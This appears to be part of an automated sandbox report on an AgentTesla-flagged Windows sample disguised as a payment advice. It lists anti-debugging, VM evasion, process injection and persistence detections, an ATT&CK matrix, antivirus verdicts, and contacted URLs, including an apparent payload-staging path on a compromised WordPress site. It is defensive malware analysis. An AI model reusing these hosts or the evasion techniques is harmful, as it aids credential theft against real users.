                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -46594s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -46218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe TID: 2408Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe TID: 2416Thread sleep count: 471 > 30
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe TID: 2408Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeLast function: Thread delayed
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040ADB0 GetProcessHeap,HeapFree,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeMemory written: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_05A849A4 GetUserNameW,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.358872577.0000000000852000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.281256788.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.477031647.0000000004A10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.474318013.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.468146329.00000000021D4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.467456643.0000000002154000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.473405683.00000000035D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.477297812.0000000004F00000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Uclldrv.exe PID: 6868, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: USD67,884.08_Payment_Advise_9083008849.exe PID: 6248, type: MEMORY
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.25f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.25f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.4f00000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.4f00000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Uclldrv.exe PID: 6868, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: USD67,884.08_Payment_Advise_9083008849.exe PID: 6248, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.358872577.0000000000852000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.281256788.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.477031647.0000000004A10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.474318013.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.468146329.00000000021D4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.467456643.0000000002154000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.473405683.00000000035D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.477297812.0000000004F00000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Uclldrv.exe PID: 6868, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: USD67,884.08_Payment_Advise_9083008849.exe PID: 6248, type: MEMORY
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.25f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.25f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.4f00000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Uclldrv.exe.4f00000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Registry Run Keys / Startup Folder1Process Injection112Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery124SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing21NTDSSecurity Software Discovery241Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 321416 Sample: USD67,884.08_Payment_Advise... Startdate: 21/11/2020 Architecture: WINDOWS Score: 100 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected AgentTesla 2->31 33 Machine Learning detection for sample 2->33 35 Initial sample is a PE file and has a suspicious name 2->35 6 Uclldrv.exe 14 2->6         started        10 USD67,884.08_Payment_Advise_9083008849.exe 1 16 2->10         started        13 Uclldrv.exe 14 2->13         started        process3 dnsIp4 21 162.159.138.232, 443, 49733, 49738 CLOUDFLARENETUS United States 6->21 23 192.168.2.1 unknown unknown 6->23 37 Multi AV Scanner detection for dropped file 6->37 39 Detected unpacking (changes PE section rights) 6->39 41 Detected unpacking (overwrites its own PE header) 6->41 43 Machine Learning detection for dropped file 6->43 15 Uclldrv.exe 2 6->15         started        25 airseaalliance.com 198.136.51.123, 49708, 49734, 49739 DIMENOCUS United States 10->25 27 discord.com 162.159.136.232, 443, 49707 CLOUDFLARENETUS United States 10->27 19 C:\Users\user\AppData\Local\...\Uclldrv.exe, PE32 10->19 dropped 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->45 47 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->47 49 Injects a PE file into a foreign processes 10->49 17 USD67,884.08_Payment_Advise_9083008849.exe 2 10->17         started        file5 signatures6 process7

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      USD67,884.08_Payment_Advise_9083008849.exe41%VirustotalBrowse
                      USD67,884.08_Payment_Advise_9083008849.exe23%ReversingLabsWin32.Trojan.Wacatac
                      USD67,884.08_Payment_Advise_9083008849.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe23%ReversingLabsWin32.Trojan.Wacatac

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      13.2.Uclldrv.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                      13.2.Uclldrv.exe.2ab0000.5.unpack100%AviraTR/Hijacker.GenDownload File
                      16.2.Uclldrv.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                      13.2.Uclldrv.exe.45e0000.6.unpack100%AviraTR/Dropper.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://airseaalliance.com/wp0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/700998750%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll0%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08480%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/7009$0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://airseaalliance.com/wp-adm00%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/t0%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-sevent80%Avira URL Cloudsafe
                      http://hHeaxI.com0%Avira URL Cloudsafe
                      https://discord.com/0%URL Reputationsafe
                      https://discord.com/0%URL Reputationsafe
                      https://discord.com/0%URL Reputationsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU80%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-se0%Avira URL Cloudsafe
                      http://airseaalliance.co0%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twent0%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/0%Avira URL Cloudsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374H0%Avira URL Cloudsafe
                      https://discord.com/J0%Avira URL Cloudsafe
                      https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      discord.com
                      162.159.136.232
                      truefalse
                        unknown
                        airseaalliance.com
                        198.136.51.123
                        truefalse
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8false
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:HTTP/1.1USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://airseaalliance.com/wpUclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://DynDns.comDynDNSUclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/UcllUclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll0848Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seventeen/7009$Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haUSD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://airseaalliance.com/wp-adm0Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/tUclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-sevent8Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://hHeaxI.comUclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://discord.com/Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seUclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.coUclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
